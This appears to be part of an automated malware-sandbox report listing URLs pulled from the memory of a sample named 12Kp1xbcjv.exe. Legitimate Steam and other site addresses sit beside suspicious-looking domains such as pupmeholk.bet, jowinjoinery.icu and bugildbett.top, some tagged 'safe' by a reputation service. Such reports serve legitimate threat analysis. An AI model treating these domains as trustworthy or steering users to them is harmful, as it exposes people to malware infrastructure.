                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318600441.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343875916.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://pupmeholk.bet/$a12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://s.ytimg.com;12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=874474847aaa395d08_63950384825012Kp1xbcjv.exe, 00000000.00000003.1150120587.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://steam.tv/12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://jowinjoinery.icu/bdWUa12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q73212Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://store.steampowered.com/privacy_agreement/12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://store.steampowered.com/points/shop/12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261471663.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl012Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://ocsp.rootca1.amazontrust.com0:12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://sketchfab.com12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lv.queniujq.cn12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://bugildbett.top/12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br12Kp1xbcjv.exe, 00000000.00000003.1237222632.0000000003DCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.youtube.com/12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://store.steampowered.com/privacy_agreement/12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://pupmeholk.bet/pLoskag12Kp1xbcjv.exe, 00000000.00000003.1294232377.0000000000898000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://pupmeholk.bet/pLoskan12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265772430.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280547088.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294232377.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1295088232.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://pupmeholk.bet/a12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
